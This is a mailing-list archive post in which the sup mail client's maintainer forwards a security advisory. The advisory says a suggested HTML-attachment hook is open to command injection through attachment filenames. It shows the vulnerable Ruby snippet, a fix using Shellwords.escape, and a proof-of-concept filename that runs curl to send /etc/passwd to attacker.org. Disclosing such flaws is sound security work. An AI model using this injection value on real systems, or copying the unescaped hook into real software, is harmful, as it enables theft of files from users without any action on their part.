From: Gaute Hope <eg@gaute.vetsj.com>
To: sup-talk <sup-talk@rubyforge.org>, sup-devel <sup-devel@rubyforge.org>
Subject: Fwd: Security issue with suggested configuration of sup
Date: Sun, 18 Aug 2013 20:14:38 +0200 [thread overview]
Message-ID: <1376849419-sup-8191@qwerzila> (raw)
Greetings suppers,
joernchen has pointed out to me that our suggested hook for viewing html
attachment has a serious security issue. The updated suggestion in [0] (wiki)
should be safer.
Please make sure that you update your mime-decode hook!
Best regards, Gaute
[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments
--- Begin forwarded message from joernchen ---
From: joernchen <...>
To: eg <eg@gaute.vetsj.com>
Date: Sat, 17 Aug 2013 14:14:29 +0200
Subject: Security issue with suggested configuration of sup
[...]
At [0] the suggested configuration for viewing HTML attachments with
sup using the mime-decode hook is given as follows:
unless sibling_types.member? "text/plain"
case content_type
when "text/html"
`/usr/bin/w3m -dump -T #{content_type} '#{filename}'`
end
end
This piece of code however is prone to command injection via the file
name of the attached file. The command injection triggers upon sup
indexing the mail, so no user interaction is needed.
A better approach would be the following:
require 'shellwords'
unless sibling_types.member? "text/plain"
case content_type
when "text/html"
`/usr/bin/w3m -dump -T #{content_type} #{Shellwords.escape filename}`
end
end
[...]
A simple PoC would be sending an email with a file attachment named
like:
'$(cd .. && cd .. && cd .. && cd .. && cd etc && curl --data @passwd attacker.org)'.html
to a sup user making use of the suggested decode hook.
[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments
[...]
reply other threads:[~2013-08-18 18:15 UTC|newest]
Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=1376849419-sup-8191@qwerzila \
--to=eg@gaute.vetsj.com \
--cc=sup-devel@rubyforge.org \
--cc=sup-talk@rubyforge.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox